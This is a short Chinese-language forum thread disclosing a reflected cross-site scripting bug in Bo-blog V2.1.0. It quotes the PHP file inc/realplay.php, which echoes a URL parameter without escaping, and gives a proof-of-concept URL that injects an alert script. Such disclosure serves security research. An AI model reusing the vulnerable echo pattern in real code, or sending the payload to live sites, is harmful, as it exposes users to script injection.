You are not logged in.
欢迎cnryan同学加入狼族:-)
版本Bo-blog V2.1.0
文件\inc\realplay.php
这个小bug有点搞笑
<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>poc
http://www.xxxx.com/inc/realplay.php?link=<script>alert('xss')</script>Offline
今天逛网站的时候发现有人在之前发过了,不好意思
Offline